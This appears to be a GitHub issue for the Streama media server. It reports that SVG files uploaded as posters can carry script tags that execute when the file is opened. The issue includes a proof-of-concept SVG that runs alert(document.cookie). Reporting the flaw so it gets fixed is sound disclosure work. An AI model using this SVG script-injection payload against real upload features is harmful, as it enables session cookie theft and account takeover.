streamaserver/streama

XSS in the Upload Poster feature using an SVG image

Open

#1 088 ouverte le 13 sept. 2021

Voir sur GitHub
 (0 commentaires) (1 réaction) (0 assignés)JavaScript (977 forks)batch import
BugHelp wanted

Métriques du dépôt

Stars
 (9 565 stars)
Métriques de merge PR
 (Aucune PR mergée en 30 j)

Description

If uploading a SVG file in the poster file browser containing a script tag, this script tag will be executed when opening the file. example file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" id="mysvg">
<script>
alert(document.cookie);
</script>
</svg>

Guide contributeur